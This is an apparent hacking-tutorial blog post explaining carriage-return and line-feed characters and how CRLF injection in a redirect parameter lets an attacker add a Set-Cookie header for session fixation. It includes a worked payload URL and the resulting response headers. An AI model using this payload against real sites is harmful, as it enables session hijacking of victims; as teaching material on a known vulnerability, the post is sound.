Hacking Tutorials Web Applications

CRLF Injection and HTTP Header Injection Attack Explained With Example

Today we are gonna talk about CRLF injection and HTTP Header Injection.

Carriage Return, New Line and Line Feed Characters

Whenever you hit enter in your text editor or somewhere else, your cursor goes to the next line right? But how the line remains intact when you copy the text somewhere else? How do programs find out where is the end of a line?

Well there are some characters which mysterious handle this sort of stuff. Lets take a look at them:

  1. Carriage Return (CR): A carriage return brings the cursor to the beginning of the line. It doesn’t take you to the next line. It is commonly represented as \r, 0x0D or %0d.
  2. Line Feed (LF): A line feed brings the cursor to the next line. It is commonly represented as \n, 0x0A or %0a.
  3. End Of Line (EOL): This is a combination of CR and LF. It brings the cursor to the next line and in the beginning of that line. It is represented as \r\n or %0d%0a.

Why we have three of these? Here’s why:

  • CR LF works on DOS/Windows
  • CR on older Macs
  • LF on Unix and modern Macs

CRLF Injection

Good question! Lets say we have a webapp which doesn’t sanitize user input and processes the characters discussed above, it causes a vulnerability called CRLF injection.
CRLF injection vulnerability can lead to HTTP response splitting, session fixation, web cache poisoning attack or cross user defacement.

HTTP Header Injection

Its an attack which exploits the CRLF injection vulnerability letting an attacker inject custom headers. Let me show you how its done.

Lets say we are browsing a website example.com. Looking pictures and clicking links and suddenly we reached a page whose URL was example.com/redirect.php?origin=something and after a few seconds we got redirected to another page. Hmm lets take a look at the response headers:

HTTP/1.1 200 OK
Date: Sat, 21 Oct 2017 11:01:32 GMT
Origin: something
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Server: cloudflare-nginx
CF-RAY: A34nob9d248a85-BMO

Wait a second, there’s Origin header with value something. We saw that somewhere right? The URL of previous page was example.com/redirect.php?origin=something and now the value of origin parameter is part of the response headers.

So the web app is including value of origin parameter in its response headers. You know what? I want to inject my custom header which is Set-Cookie: SessionID=hacked. Lets do this by injecting it in the origin parameter.
example.com/redirect.php?origin=Set-Cookie: SessionID=hacked
And here are the response headers:

HTTP/1.1 200 OK
Date: Sat, 21 Oct 2017 11:01:32 GMT
Origin: Set-Cookie: SessionID=hacked
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Server: cloudflare-nginx
CF-RAY: A34nob9d248a85-BMO

Opps! We missed the target. Our header should be in the next line. Any guesses how to do that? CRLF injection!
example.com/redirect.php?origin=done%0d%0aSet-Cookie: SessionID=hacked
Annnnd boom!

HTTP/1.1 200 OK
Date: Sat, 21 Oct 2017 11:01:32 GMT
Origin: done
Set-Cookie: SessionID=hacked
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Server: cloudflare-nginx
CF-RAY: A34nob9d248a85-BMO

As you saw that I am able to add custom headers to response headers by injecting CRLF characters and this is what we call HTTP Header Injection.
Whats so special about the ability to add custom headers?
As you saw in this example, we injected a header Set-Cookie which is used to supply cookies from the server to the client. So basically if a victim clicks our link, the cookie hacked will be stored in their browser and this is what we call a session fixation attack.

Also Read: Guessing 25% of the PIN, Pattern and String Based Passwords


Subscribe Now

Subscribe for free and get latest articles delivered right into your inbox.

Thank you for subscribing.

Something went wrong.

Categories

>-----ADVERTISEMENT-----<